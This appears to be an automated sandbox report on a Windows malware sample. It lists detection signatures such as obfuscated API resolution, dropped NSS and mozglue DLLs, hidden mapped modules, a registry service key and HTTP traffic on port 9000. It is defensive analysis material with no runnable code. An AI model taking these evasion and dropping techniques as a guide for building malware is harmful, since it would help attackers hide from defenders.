Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00416240
PE file contains an invalid checksum
Source: relay.dll.0.dr Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: relay.dll.2.dr Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: IIDHJDGCGD.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x8897e
Source: khjsru.15.dr Static PE information: real checksum: 0x0 should be: 0xc411c
Source: tiktok[1].exe.1.dr Static PE information: real checksum: 0x0 should be: 0x8897e
Source: pasb.3.dr Static PE information: real checksum: 0x0 should be: 0xc411c
Source: kO1P1YnLst.exe Static PE information: real checksum: 0x7838b should be: 0x78394
PE file contains sections with non-standard names
Source: u5c4.3.exe.0.dr Static PE information: section name: .didata
Source: nss3[1].dll.1.dr Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.1.dr Static PE information: section name: .00cfg
Source: freebl3.dll.1.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr Static PE information: section name: .didat
Source: nss3.dll.1.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0042786C push ecx; ret 0_2_0042787C
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0042780C push eax; ret 0_2_0042782A
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0042E3A5 push esi; ret 0_2_0042E3AE
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_00409D06 push ecx; ret 0_2_00409D19
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_004097B6 push ecx; ret 0_2_004097C9
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_042574D3 pushad ; retf 0_2_042574D4
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_04258568 push ecx; iretd 0_2_0425856E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_04259D81 pushad ; retf 0_2_04259D88
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0425B7F3 push ebp; iretd 0_2_0425B826
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_04259A6B push 2B991403h; ret 0_2_04259A72
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0425A391 push 00000061h; retf 0_2_0425A399
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BE9F6D push ecx; ret 0_2_05BE9F80
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BFC9FD push esp; retf 0_2_05BFC9FE
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BFC3FF push esp; retf 0_2_05BFC407
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05C01B72 push dword ptr [esp+ecx-75h]; iretd 0_2_05C01B76
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05BE9A1D push ecx; ret 0_2_05BE9A30
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_05C07A73 push eax; ret 0_2_05C07A91
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_004176C5 push ecx; ret 1_2_004176D8
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00EFFAB6 push ecx; ret 2_2_00EFFAC9
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00EFFB55 push ecx; ret 2_2_00EFFB68
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DB0F0B push 8B00F6D1h; retf 2_2_00DB0F10
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_6C8947D9 push ecx; ret 2_2_6C8947EC
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_6C896365 push ecx; ret 2_2_6C896378
Source: pasb.3.dr Static PE information: section name: .text entropy: 6.816444465715168
Source: khjsru.15.dr Static PE information: section name: .text entropy: 6.816444465715168
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe File created: C:\Users\user\AppData\Roaming\SecureClient\relay.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File created: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Jump to dropped file
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File created: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe Jump to dropped file
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File created: C:\Users\user\AppData\Local\Temp\u5c4.2\UIxMarketPlugin.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe File created: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\khjsru Jump to dropped file
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File created: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File created: C:\Users\user\AppData\Local\Temp\u5c4.2\relay.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\pasb Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\pasb Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\khjsru Jump to dropped file
Creates or modifies windows services
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Found hidden mapped module (file has been removed from disk)
Source: C:\Windows\SysWOW64\cmd.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PASB
Source: C:\Windows\SysWOW64\cmd.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\KHJSRU
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49864
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00408761
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
